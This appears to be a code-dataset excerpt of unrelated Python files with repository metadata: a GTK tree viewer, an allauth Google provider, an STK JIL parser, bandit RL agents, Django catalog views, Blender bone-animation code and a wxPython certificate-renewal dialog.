def fill_preview(self, path):
self.preview.set_from_file(path)
def create_tree(self):
# Scrolled Window
self.sw = Gtk.ScrolledWindow()
self.sw.set_shadow_type(Gtk.ShadowType.ETCHED_IN)
self.sw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
self.store = Gtk.ListStore(str, str)
self.tree = Gtk.TreeView(self.store)
self.sw.add(self.tree)
self.tree.set_rules_hint(True)
# Connect right click popup search menu
self.popup_handler = self.tree.connect('button-press-event', self.popup_menu)
# Create the column
bblocks = Gtk.TreeViewColumn()
bblocks.set_title("Basic Blocks")
cell = Gtk.CellRendererText()
bblocks.pack_start(cell, True)
bblocks.add_attribute(cell, "text", 0)
self.treestore = Gtk.TreeStore(str)
# Add column to tree
self.tree.append_column(bblocks)
self.tree.set_model(self.treestore)
self.tree.expand_all()
def update_tree(self, function):
# Clear contents
self.treestore.clear()
# Iterate bb and add to the tree
it = self.treestore.append(None, [function])
nodes = self.nodes.keys()
nodes.sort()
for element in nodes:
self.treestore.append(it, [element])
self.tree.set_model(self.treestore)
self.tree.expand_all()
def popup_menu(self, tree, event):
if event.button == 1:
coordinates = tree.get_path_at_pos(int(event.x), int(event.y))
# Get the information about the click.
# coordinates is None if the click is outside the rows but inside
# the widget.
if not coordinates:
return False
(path, column, x, y) = coordinates
if len(path) == 2 and self.nodes:
node = self.treestore[path][0]
self.dot_widget.animate_to(int(self.nodes[node][0]), int(self.nodes[node][1]))
|
gpl-2.0
| 5,638,959,716,393,014,000
| 37.769663
| 139
| 0.605564
| false
| 3.528119
| false
| false
| false
|
maurodoglio/taarweb
|
taarweb/users/provider.py
|
1
|
1486
|
from allauth.socialaccount.app_settings import QUERY_EMAIL
from allauth.socialaccount.providers.google.provider import (GoogleAccount,
GoogleProvider,
Scope)
class TaarGoogleAccount(GoogleAccount):
def get_profile_url(self):
"""
The profile URL field is called 'profile' for OpenIDConnect profiles,
see https://developers.google.com/+/web/api/rest/openidconnect/getOpenIdConnect
"""
return self.account.extra_data.get('profile')
class TaarGoogleProvider(GoogleProvider):
def extract_uid(self, data):
return str(data['sub'])
def get_default_scope(self):
"Override the default method to prepend 'openid' and add specific order"
scope = ['openid']
if QUERY_EMAIL:
scope.append(Scope.EMAIL)
scope.append(Scope.PROFILE)
return scope
def get_hosted_domain(self):
"If configured returns the Google Apps domain"
return self.get_settings().get('HOSTED_DOMAIN', None)
def get_auth_params(self, request, action):
"If configured, adds the hosted domain to the auth request"
params = super().get_auth_params(request, action)
hosted_domain = self.get_hosted_domain()
if hosted_domain is not None:
params['hd'] = hosted_domain
return params
provider_classes = [TaarGoogleProvider]
|
mpl-2.0
| -2,247,812,986,946,630,000
| 34.380952
| 87
| 0.617766
| false
| 4.435821
| false
| false
| false
|
dmanev/ArchExtractor
|
ArchExtractor/umlgen/Specific/STK/StkParser/StkJilFileCriteria/StkJilDataCriteria.py
|
1
|
2829
|
import re
import PortInterface.ProvidedPort
import PortInterface.RequiredPort
import PortInterface.SenderReceiverInterface
import Datatype.ArrayDataType
import PortInterface.DataElement
import StkParser.StkPortCriteria
import Components.IComponent
import Parser.IPortCriteria
class StkJilDataCriteria(StkParser.StkPortCriteria.StkPortCriteria):
"""STK JIL file data access criteria"""
def execute(self, inpTextContent, inoutIComponent):
## Bouml preserved body begin 0003536F
if re.search(r'Data\s+(\w+)', inpTextContent):
nextItemIsDataConfig = 0
dataName = None
for item in re.split(r'(Data\s+\w+)', inpTextContent):
nameMatchObj = re.search(r'Data\s+(\w+)', item)
if nameMatchObj:
nextItemIsDataConfig = 1
dataName = nameMatchObj.group(1)
elif nextItemIsDataConfig:
nextItemIsDataConfig = 0
dataProps = self.extractLevelOneBlock(item)
if dataProps:
dataType, hasArray = re.findall(r'\s*Type\s*=\s*([US]\d+)(Array|)',
dataProps, re.I)[0]
dtf = self.getDataTypeFactory()
DT = dtf.getDataType(dataType)
DE = PortInterface.DataElement.DataElement()
DE.setName(dataName)
if hasArray:
arrayProps = self.extractLevelOneBlock(dataProps)
arraySize = re.findall(r'\s*Size\s*=\s*(\d+)',
arrayProps, re.I)[0]
arrayDT = dtf.getArrayDataType('Arr'+arraySize+dataType)
arrayDT.itsDataType = DT
arrayDT.setMaxNumberOfElements(arraySize)
DE.itsDataType = arrayDT
else:
DE.itsDataType = DT
pif = self.getPortInterfaceFactory()
sendRecvIf = pif.getSenderReceiverIf(dataName, [DE])
provPortSetter = PortInterface.ProvidedPort.ProvidedPort(sendRecvIf)
provPortSetter.setName("set"+dataName)
provPortGetter = PortInterface.ProvidedPort.ProvidedPort(sendRecvIf)
provPortGetter.setName("get"+dataName)
inoutIComponent.addPort(provPortSetter)
inoutIComponent.addPort(provPortGetter)
return inoutIComponent
## Bouml preserved body end 0003536F
def __init__(self):
super(StkJilDataCriteria, self).__init__()
pass
|
gpl-3.0
| 6,982,030,154,229,971,000
| 47.775862
| 92
| 0.537292
| false
| 4.570275
| false
| false
| false
|
andreweskeclarke/reinforcement_learning
|
src/agents.py
|
1
|
5084
|
import math
import random
class Agent:
def __init__(self, actions, options={}):
self.rgen = random.SystemRandom() # cryptographically secure, unlike random
self.actions = actions
self.last_action = None
def __choose_exploitative_action__(self):
raise Exception('Not implemented!')
def __choose_exploratory_action__(self):
raise Exception('Not implemented!')
def __should_exploit__(self):
raise Exception('Not implemented!')
def __update__(self, reward, state=None):
raise Exception('Not implemented!')
def choose(self):
if self.__should_exploit__():
self.last_action = self.__choose_exploitative_action__()
else:
self.last_action = self.__choose_exploratory_action__()
return self.last_action
def update(self, reward, state=None):
self.__update__(reward, state=None)
class EGreedyAgent(Agent):
def __init__(self, actions, options={}):
super(EGreedyAgent, self).__init__(actions, options)
use_optimistic = 'optimistic' in options and options['optimistic']
initial_reward = 5 if use_optimistic else 0
self.avg_rewards = [0 for a in self.actions]
self.n_observations = [0 for a in self.actions]
self.epsilon = options['epsilon']
def __choose_exploitative_action__(self):
return self.avg_rewards.index(max(self.avg_rewards))
def __choose_exploratory_action__(self):
return self.rgen.choice(self.actions)
def __should_exploit__(self):
return self.rgen.random() < (1 - self.epsilon)
def __update__(self, reward, state=None):
last_action = self.last_action
avg = self.avg_rewards[last_action]
self.n_observations[last_action] += 1
self.avg_rewards[last_action] = avg + (reward - avg)/self.n_observations[last_action]
def softmax_choice(rgen, actions, action_prefs):
choice = rgen.random()
cumulative_probability = 1
softmax_denominator = sum([math.exp(p) for p in action_prefs])
for a in actions:
softmax_a = math.exp(action_prefs[a]) / softmax_denominator
cumulative_probability = cumulative_probability - softmax_a
if cumulative_probability <= choice:
return a
assert(False)
def discrete_choice(rgen, actions, action_prefs):
choice = rgen.random()
cumulative_probability = 1
for a in actions:
cumulative_probability = cumulative_probability - action_prefs[a]
if cumulative_probability <= choice:
return a
assert(False)
class EGreedySoftmaxAgent(EGreedyAgent):
def __choose_exploratory_action__(self):
return softmax_choice(self.rgen, self.actions, self.avg_rewards)
class ReinforcementComparisonAgent(Agent):
def __init__(self, actions, options={}):
super(ReinforcementComparisonAgent, self).__init__(actions, options)
self.action_preferences = [0 for a in self.actions]
self.alpha = options['alpha']
self.beta = options['beta']
self.reference_reward = 0
self.last_action = None
def __choose_exploitative_action__(self):
raise 'Unreachable code was reached!'
def __choose_exploratory_action__(self):
return softmax_choice(self.rgen, self.actions, self.action_preferences)
def __should_exploit__(self):
return False
def __update__(self, reward, state=None):
old_pref = self.action_preferences[self.last_action]
self.action_preferences[self.last_action] = old_pref + self.beta * (reward - self.reference_reward)
self.reference_reward = self.reference_reward + self.alpha * (reward - self.reference_reward)
class PursuitAgent(Agent):
def __init__(self, actions, options={}):
super(PursuitAgent, self).__init__(actions, options)
use_optimistic = 'optimistic' in options and options['optimistic']
initial_reward = 5 if use_optimistic else 0
self.avg_rewards = [0 for a in self.actions]
self.n_observations = [0 for a in self.actions]
self.action_probs = [1.0/len(self.actions) for a in self.actions]
self.beta = options['beta']
def __choose_exploitative_action__(self):
raise 'Unreachable code was reached!'
def __choose_exploratory_action__(self):
return discrete_choice(self.rgen, self.actions, self.action_probs)
def __should_exploit__(self):
return False
def __update__(self, reward, state=None):
last_action = self.last_action
avg = self.avg_rewards[last_action]
self.n_observations[last_action] += 1
self.avg_rewards[last_action] = avg + (reward - avg)/self.n_observations[last_action]
max_index = self.avg_rewards.index(max(self.avg_rewards))
for i in range(0, len(self.action_probs)):
prob = self.action_probs[i]
if i != max_index:
self.action_probs[i] = prob + (self.beta * (0 - prob))
else:
self.action_probs[i] = prob + (self.beta * (1 - prob))
|
mit
| -68,055,493,988,964,190
| 35.84058
| 107
| 0.635917
| false
| 3.765926
| false
| false
| false
|
escsun/radio-shop
|
catalog/views.py
|
1
|
1793
|
from django.shortcuts import render, get_object_or_404
from .models import Category, Product, Value
from django.contrib import messages
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.core.exceptions import ObjectDoesNotExist
from cart.forms import CartAddProductForm
def catalog_index(request, id=None):
categories = Category.objects.filter(parent_id=id)
try:
category = Category.objects.get(id=id)
except ObjectDoesNotExist:
category = Category.objects.none()
if not categories:
products_list = Product.objects.filter(category_id=id, is_available=True)
paginator = Paginator(products_list, per_page=25)
page = request.GET.get('page')
cart_product_form = CartAddProductForm()
try:
products = paginator.page(page)
except PageNotAnInteger:
products = paginator.page(1)
except EmptyPage:
products = paginator.page(paginator.num_pages)
if not products:
messages.error(request, "В данной категории товаров нет")
return render(request, 'catalog_products.html', {
"products": products,
"category": category,
"cart_product_form": cart_product_form
})
response = render(request, 'catalog_base.html', {
"categories": categories,
"category": category
})
return response
def catalog_product_detail(request, id):
product = Product.objects.get(id=id)
category = Category.objects.get(id=product.category.id)
values = Value.objects.filter(product_id=id)
return render(request, 'catalog_product_detail.html', {
"product": product,
"values": values,
"category": category
})
|
gpl-3.0
| 3,052,322,435,605,630,000
| 34.36
| 81
| 0.664969
| false
| 4.015909
| false
| false
| false
|
niacdoial/blemd
|
pseudobones.py
|
1
|
21031
|
from mathutils import Vector, Euler, Matrix
import bpy
import math
import re
from .common import dict_get_set
from . import common
from .Matrix44 import rotation_part
# import weakref
import logging
log = logging.getLogger('bpy.ops.import_mesh.bmd.pseudobones')
NtoB = Matrix([[1,0,0,0],
[0,0,-1,0],
[0,1,0,0],
[0,0,0,1]])
BtoN = Matrix([[1,0,0,0],
[0,0,1,0],
[0,-1,0,0],
[0,0,0,1]])
def product(lamb, vct):
ret = vct.copy()
ret.x *= lamb
ret.y *= lamb
ret.z *= lamb
return ret
def sum2(vct1, vct2):
ret = vct1.copy()
ret.x += vct2.x
ret.y += vct2.y
ret.z += vct2.z
return ret
def subtract2(vct1, vct2):
ret = vct1.copy()
ret.x -= vct2.x
ret.y -= vct2.y
ret.z -= vct2.z
return ret
def vect_normalize(vect):
length = math.sqrt(vect.x**2 + vect.y**2 + vect.z**2)
if length < .01:
log.error('Vector to be normalized is near zero. Returning (0,0,1) to avoid crashes')
return Vector((0,0,1))
tempv = vect
tempv.x /= length
tempv.y /= length
tempv.z /= length
return tempv
def cubic_interpolator(t1, y1, d1, t2, y2, d2, t):
if -0.001 < t2-t1 < 0.001:
log.warning('cannot interpolate between almost identiqual times')
return (y1+y2) / 2, 0
tn = (t-t1)/(t2-t1) # normalized time coordinate
d1 *= (t2-t1) # adapted derivatives for the normalized time interval
d2 *= (t2-t1)
# temporary values
# for the value
ya = (2*tn**3 - 3*tn**2 + 1)*y1
yb = (tn**3 - 2*tn**2 + tn)*d1
yc = (-2*tn**3 + 3*tn**2)*y2
yd = (tn**3 - tn**2)*d2
# and the tangent (will have to be corrected since d(a(b))=d(b)*d(a)(b))
da = (6*tn**2 - 6*tn) * y1
db = (3*tn**2 - 4*tn + 1) * d1
dc = (-6*tn**2 + 6*tn) * y2
dd = (3*tn**2 - 2*tn) * d2
y = ya+yb+yc+yd
d = (da+db+dc+dd)/(t2-t1)
return y, d, d
###
# the goal here is to get the matrix adapted to blender animation
# (from default pose to correct pose)
# in blender, the matrix chain looks like
# this (each contains translation and rotation):
# origin_s*origin_d*bone_1_s*bone_1_d*....*bone_n_s*bone_n_d
def get_dynamic_mtx(p_bone, frame):
if frame not in p_bone.computed_d_matrices.keys():
local_mtx_y, local_mtx_ydL, local_mtx_ydR = p_bone.frames.get_mtx(frame)
inv_static_mtx = p_bone.jnt_frame.getFrameMatrix().inverted()
p_bone.computed_d_matrices[frame] = (inv_static_mtx * local_mtx_y,
inv_static_mtx * local_mtx_ydL,
inv_static_mtx * local_mtx_ydR)
return p_bone.computed_d_matrices[frame]
def get_pos_vct(p_bone, frame):
EPSILON = 1E-4
y, ydL, ydR = get_dynamic_mtx(p_bone, frame)
y = y.to_translation()
ydL = ydL.to_translation()
ydR = ydR.to_translation()
# yd = get_dynamic_mtx(p_bone, frame+EPSILON).position()
dL = (ydL-y)/EPSILON
dR = (ydR-y)/EPSILON
return y, dL, dR
def get_rot_vct(p_bone, frame):
EPSILON = 1E-4
y, ydL, ydR = get_dynamic_mtx(p_bone, frame)
y = y.to_euler('XYZ')
ydL = ydL.to_euler('XYZ')
ydR = ydR.to_euler('XYZ')
# yd = get_dynamic_mtx(p_bone, frame+EPSILON).rotation()
dL = product(1/EPSILON, subtract2(ydL, y))
dR = product(1/EPSILON, subtract2(ydR, y))
return y, dL, dR
def get_sc_vct(p_bone, frame):
y, dL, dR = p_bone.frames.get_sc(frame)
y.x /= p_bone.jnt_frame.sx
y.y /= p_bone.jnt_frame.sy
y.z /= p_bone.jnt_frame.sz
dL.x /= p_bone.jnt_frame.sx
dL.y /= p_bone.jnt_frame.sy
dL.z /= p_bone.jnt_frame.sz
dR.x /= p_bone.jnt_frame.sx
dR.y /= p_bone.jnt_frame.sy
dR.z /= p_bone.jnt_frame.sz
return y, dL, dR
instances = {}
class KeyFrames:
def __init__(self):
self.times = {}
self.positions = [{}, {}, {}]
self.rotations = [{}, {}, {}]
self.scales = [{}, {}, {}]
def feed_anim(self, anim, include_sc=True, fr_sc=1, fr_of=0):
for key in anim.translationsX:
self.positions[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.translationsY:
self.positions[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.translationsZ:
self.positions[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.rotationsX:
self.rotations[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
for key in anim.rotationsY:
self.rotations[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
for key in anim.rotationsZ:
self.rotations[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
if include_sc:
for key in anim.scalesX:
self.scales[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
for key in anim.scalesY:
self.scales[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
for key in anim.scalesZ:
self.scales[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
# add last frame on everything (to avoid crashes), but not register them as 'real'
anim_length = max(self.times.keys())
for coordinate in (0,1,2):
max_time = max(self.positions[coordinate].keys())
if max_time < anim_length:
self.positions[coordinate][anim_length] = self.positions[coordinate][max_time]
max_time = max(self.rotations[coordinate].keys())
if max_time < anim_length:
self.rotations[coordinate][anim_length] = self.rotations[coordinate][max_time]
max_time = max(self.scales[coordinate].keys())
if max_time < anim_length:
self.scales[coordinate][anim_length] = self.scales[coordinate][max_time]
def _get_vt(self, data, time):
if time in data.keys():
return data[time]
elif len(data.keys()) == 1:
return next(iter(data.values()))
prev_t = -math.inf
next_t = +math.inf
for frame_t in data.keys():
if prev_t < frame_t < time:
prev_t = frame_t
elif time < frame_t < next_t:
next_t = frame_t
return cubic_interpolator(prev_t, data[prev_t][0], data[prev_t][2],
next_t, data[next_t][0], data[next_t][1], time)
def get_pos(self, time):
temp_x = self._get_vt(self.positions[0], time)
temp_y = self._get_vt(self.positions[1], time)
temp_z = self._get_vt(self.positions[2], time)
return (Vector((temp_x[0], temp_y[0], temp_z[0])),
Vector((temp_x[1], temp_y[1], temp_z[1])),
Vector((temp_x[2], temp_y[2], temp_z[2])))
def get_rot(self, time):
temp_x = self._get_vt(self.rotations[0], time)
temp_y = self._get_vt(self.rotations[1], time)
temp_z = self._get_vt(self.rotations[2], time)
return (Euler((temp_x[0], temp_y[0], temp_z[0]), 'XYZ'),
Euler((temp_x[1], temp_y[1], temp_z[1]), 'XYZ'),
Euler((temp_x[2], temp_y[2], temp_z[2]), 'XYZ'))
def get_sc(self, time):
temp_x = self._get_vt(self.scales[0], time)
temp_y = self._get_vt(self.scales[1], time)
temp_z = self._get_vt(self.scales[2], time)
return (Vector((temp_x[0], temp_y[0], temp_z[0])),
Vector((temp_x[1], temp_y[1], temp_z[1])),
Vector((temp_x[2], temp_y[2], temp_z[2])))
def get_mtx(self, time):
EPSILON = 1E-4
vct_y, vct_dL, vct_dR = self.get_pos(time)
rot_y, rot_dL, rot_dR = self.get_rot(time)
vct_ydL = sum2(vct_y, product(EPSILON, vct_dL))
rot_ydL = sum2(rot_y, product(EPSILON, rot_dL))
vct_ydR = sum2(vct_y, product(EPSILON, vct_dR))
rot_ydR = sum2(rot_y, product(EPSILON, rot_dR))
return ( (Matrix.Translation(vct_y) * rot_y.to_matrix().to_4x4()),
(Matrix.Translation(vct_ydL) * rot_ydL.to_matrix().to_4x4()),
(Matrix.Translation(vct_ydR) * rot_ydR.to_matrix().to_4x4()) )
class Pseudobone:
def __init__(self, parentBone, frame, matrix, startpoint, endpoint):
self._name = None
ori = endpoint - startpoint
self.endpoint = endpoint
self.length = math.sqrt(ori.x**2 + ori.y**2 + ori.z**2)
self.orientation = vect_normalize(ori)
self.scale = Vector((1, 1, 1))
self.jnt_frame = None
# self.rotation_euler = Euler((0, 0, 0), 'XYZ')
self.position = startpoint
self.frames = KeyFrames()
# self.inverted_static_mtx = None
self.computed_d_matrices = {}
self.computed_t_matrices = {}
# self.scale_kf = {} # keyframes (values)
# self.scale_tkf = {} # keyframes (tangents)
# self.rotation_kf = {}
# self.rotation_tkf = {}
# self.position_kf = {}
# self.position_tkf = {}
# self.transform = mathutils.Matrix.Identity(4) # what to do with that? it will be ultimately useless.
self._parent = None
self.children = []
# property business --------------------------------
def _getname():
return self._name
def _setname(val):
global instances
if self._name is not None:
del instances[self._name]
if val is None and val in instances.keys():
raise ValueError('name taken')
self._name = val
instances[val] = self
def _delname():
self.name = None
self.name = property(_getname, _setname, _delname)
def _getparent():
return self._parent
def _setparent(val):
if isinstance(self.parent.fget(), Pseudobone) and (self in self.parent.fget().children):
self.parent.fget().children.remove(self)
self._parent = val
if val is None or isinstance(val, Vector):
return
val.children.append(self)
self.parent = property(_getparent, _setparent)
def _setinchildren(holder, val):
list.append(holder.children, val)
val._parent = holder
# self.children_append = (lambda self2, x: _setinchildren(self, x))
if isinstance(frame, str):
self.name.fset(frame)
else:
self.jnt_frame = frame
self.name.fset(frame.name)
self.parent.fset(parentBone)
self.matrix = matrix
# defines self.name, self.parent, self.children_append.
def pre_delete(self):
# call before losing variable to avoid memory leak
self.parent.fset(None)
for com in self.children:
com.pre_delete()
def _tree_to_array(self, dest):
"""inner function. do not call."""
dest.append(self)
for com in self.children:
com._tree_to_array(dest)
def tree_to_array(self):
"""returns a list of all bones"""
ret = []
self._tree_to_array(ret)
return ret
def reset(self):
self.frames = KeyFrames()
self.computed_d_matrices = {}
self.computed_t_matrices = {}
def get_z(self):
if common.GLOBALS.no_rot_conversion:
return rotation_part(self.matrix) * Vector((0,0,1))
else:
return NtoB*rotation_part(self.matrix)*BtoN * Vector((0,0,1))
def getBoneByName(name):
global instances
try:
return instances[name]
except KeyError:
return None
def getvct(one, distance, tgt):
"""get the right keyframe handle vector""" # XCX use me!
# method one:
return Vector((one, one*tgt))
finder = re.compile(r'''pose\.bones\[['"](\w*)['"]\]\.(\w*)''')
#used to determine what curves belong to what bones
def apply_animation(bones, arm_obj, jntframes, name=None):
"""apply keyframes from pseudobones to real, armature bones"""
if name:
arm_obj.animation_data.action = bpy.data.actions.new(name + '_action')
else:
arm_obj.animation_data.action = bpy.data.actions.new(arm_obj.name+'_action')
bpy.context.scene.frame_current = 0
# warning: here, the `name` var changes meaning
for com in bones:
name = com.name.fget()
arm_obj.data.bones[name].use_inherit_scale = False # scale can be applied
posebone = arm_obj.pose.bones[name]
if common.GLOBALS.no_rot_conversion:
posebone.rotation_mode = "XYZ"
else:
posebone.rotation_mode = "XZY" # remember, coords are flipped
bpy.context.scene.frame_current = 0
# this keyframe is needed, overwritten anyways
# also it is always at 1 because this function is called once per action
posebone.keyframe_insert('location')
posebone.keyframe_insert('rotation_euler')
posebone.keyframe_insert('scale')
fcurves = arm_obj.animation_data.action.fcurves
data = {}
for curve in fcurves:
# create data in dicts ({bonename:{datatype:[0,1,2]...}...})
try:
bonename, datatype = finder.match(curve.data_path).groups()
except TypeError: # cannit unpack None: this fsurve is not interesting
continue
bonedict = common.dict_get_set(data, bonename, {})
datadict = common.dict_get_set(bonedict, datatype, [None, None, None])
datadict[curve.array_index] = curve
# create keyframes, with tengents
for com in bones:
name = com.name.fget()
bonedict = data[name]
posebone = arm_obj.pose.bones[name]
bpy.context.scene.frame_current = 0
posebone.keyframe_insert('location')
posebone.keyframe_insert('rotation_euler')
posebone.keyframe_insert('scale')
every_frame = list(com.frames.times.keys())
every_frame.sort()
refpos = com.jnt_frame
if type(com.parent.fget()) is not Pseudobone:
com.rotmatrix = Matrix.Identity(4)
com.parentrot = Matrix.Identity(4)
else:
com.rotmatrix = com.parent.fget().rotmatrix
com.parentrot = com.parent.fget().rotmatrix
tempmat = Euler((refpos.rx, refpos.ry, refpos.rz), 'XYZ').to_matrix().to_4x4()
com.rotmatrix *= tempmat
cancel_ref_rot = tempmat.inverted()
for frame in every_frame:
bpy.context.scene.frame_current = frame
# flip y and z when asked for
if com.frames.times[frame][0]:
vct, tgL, tgR = get_pos_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, -tgL.z
tgR.z, tgR.y = tgR.y, -tgR.z
vct.z, vct.y = vct.y, -vct.z
if not math.isnan(vct.x):
posebone.location[0] = vct.x
co = bonedict['location'][0].keyframe_points[-1].co
bonedict['location'][0].keyframe_points[-1].handle_left = co+Vector((-1, -tgL.x))
bonedict['location'][0].keyframe_points[-1].handle_right = co+Vector((1, tgR.x))
posebone.keyframe_insert('location', 0)
# fixed: add frame to keyframes AFTER setting the right value to it. so conter-intuitive.
if not math.isnan(vct.y):
posebone.location[1] = vct.y
co = bonedict['location'][1].keyframe_points[-1].co
bonedict['location'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['location'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('location', 1)
if not math.isnan(vct.z):
posebone.location[2] = vct.z
co = bonedict['location'][2].keyframe_points[-1].co
bonedict['location'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['location'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('location', 2)
if com.frames.times[frame][1]:
vct, tgL, tgR = get_rot_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, -tgL.z
tgR.z, tgR.y = tgR.y, -tgR.z
vct.z, vct.y = vct.y, -vct.z
if not math.isnan(vct.x):
posebone.rotation_euler[0] = vct.x
co = bonedict['rotation_euler'][0].keyframe_points[-1].co
bonedict['rotation_euler'][0].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.x))
bonedict['rotation_euler'][0].keyframe_points[-1].handle_right = co + Vector((1, tgR.x))
posebone.keyframe_insert('rotation_euler', 0)
if not math.isnan(vct.y):
posebone.rotation_euler[1] = vct.y
co = bonedict['rotation_euler'][1].keyframe_points[-1].co
bonedict['rotation_euler'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['rotation_euler'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('rotation_euler', 1)
if not math.isnan(vct.z):
posebone.rotation_euler[2] = vct.z
co = bonedict['rotation_euler'][2].keyframe_points[-1].co
bonedict['rotation_euler'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['rotation_euler'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('rotation_euler', 2)
if com.frames.times[frame][2]:
vct, tgL, tgR = get_sc_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, tgL.z
tgR.z, tgR.y = tgR.y, tgR.z
vct.z, vct.y = vct.y, vct.z
if not math.isnan(vct.x):
posebone.scale[0] = vct.x
co = bonedict['scale'][0].keyframe_points[-1].co
bonedict['scale'][0].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.x))
bonedict['scale'][0].keyframe_points[-1].handle_right = co + Vector((1, tgR.x))
posebone.keyframe_insert('scale', 0)
if not math.isnan(vct.y):
posebone.scale[1] = vct.y
co = bonedict['scale'][1].keyframe_points[-1].co
bonedict['scale'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['scale'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('scale', 1)
if not math.isnan(vct.z):
posebone.scale[2] = vct.z
co = bonedict['scale'][2].keyframe_points[-1].co
bonedict['scale'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['scale'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('scale', 2)
return arm_obj.animation_data.action
|
gpl-3.0
| 5,015,250,740,609,675,000
| 39.481262
| 111
| 0.53735
| false
| 3.21035
| false
| false
| false
|
CFIS-Octarine/octarine
|
validate/gui/views/errorhandling.py
|
1
|
5325
|
__author__ = "David Rusk <drusk@uvic.ca>"
import wx
class CertificateDialog(wx.Dialog):
def __init__(self, parent, handler, error_message):
super(CertificateDialog, self).__init__(parent, title="Certificate Error")
self.handler = handler
self.error_message = error_message
self._init_ui()
self._do_layout()
def _init_ui(self):
self.header_text = wx.StaticText(self, label="An error has occured "
"which likely indicates "
"your CADC certificate "
"is invalid:")
self.error_text = wx.StaticText(self, label=self.error_message)
error_font = wx.Font(12, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_ITALIC,
wx.FONTWEIGHT_NORMAL)
self.error_text.SetFont(error_font)
self.prompt_text = wx.StaticText(self, label="Enter your CADC "
"credentials to get a "
"new certificate:")
self.username_label = wx.StaticText(self, label="CADC Username: ")
self.username_field = wx.TextCtrl(self)
self.password_label = wx.StaticText(self, label="Password: ")
self.password_field = wx.TextCtrl(self, style=wx.TE_PASSWORD)
self.accept_button = wx.Button(self, label="Get certificate")
self.cancel_button = wx.Button(self, label="Cancel")
self.accept_button.Bind(wx.EVT_BUTTON, self.on_accept)
self.cancel_button.Bind(wx.EVT_BUTTON, self.on_cancel)
self.username_field.SetFocus()
self.accept_button.SetDefault()
def _do_layout(self):
vsizer = wx.BoxSizer(wx.VERTICAL)
flag = wx.ALIGN_CENTER | wx.ALL
border = 10
vsizer.Add(self.header_text, flag=flag, border=border)
vsizer.Add(self.error_text, flag=flag, border=border)
line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL)
vsizer.Add(line, flag=wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.RIGHT | wx.TOP, border=5)
vsizer.Add(self.prompt_text, flag=flag, border=border)
input_sizer = wx.FlexGridSizer(cols=2, hgap=5, vgap=border)
input_sizer.Add(self.username_label)
input_sizer.Add(self.username_field, proportion=1, flag=wx.EXPAND)
input_sizer.Add(self.password_label, wx.EXPAND)
input_sizer.Add(self.password_field, proportion=1, flag=wx.EXPAND)
input_sizer.AddGrowableCol(1, proportion=1)
vsizer.Add(input_sizer, flag=wx.EXPAND)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_sizer.Add(self.accept_button, flag=wx.RIGHT, border=5)
button_sizer.Add(self.cancel_button, flag=wx.LEFT, border=5)
vsizer.Add(button_sizer, flag=flag, border=border)
padding_sizer = wx.BoxSizer(wx.HORIZONTAL)
padding_sizer.Add(vsizer, flag=wx.ALL, border=20)
self.SetSizerAndFit(padding_sizer)
def on_cancel(self, event):
self.Close()
def on_accept(self, event):
username = self.username_field.GetValue()
password = self.password_field.GetValue()
self.handler.refresh_certificate(username, password)
self.Close()
class RetryDownloadDialog(wx.Dialog):
def __init__(self, parent, handler, error_message):
super(RetryDownloadDialog, self).__init__(parent, title="Download Error")
self.handler = handler
self.error_message = error_message
self._init_ui()
self._do_layout()
def _init_ui(self):
self.header_text = wx.StaticText(self, label="One or more downloads "
"failed:")
self.error_text = wx.StaticText(self, label=self.error_message)
error_font = wx.Font(12, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_ITALIC,
wx.FONTWEIGHT_NORMAL)
self.error_text.SetFont(error_font)
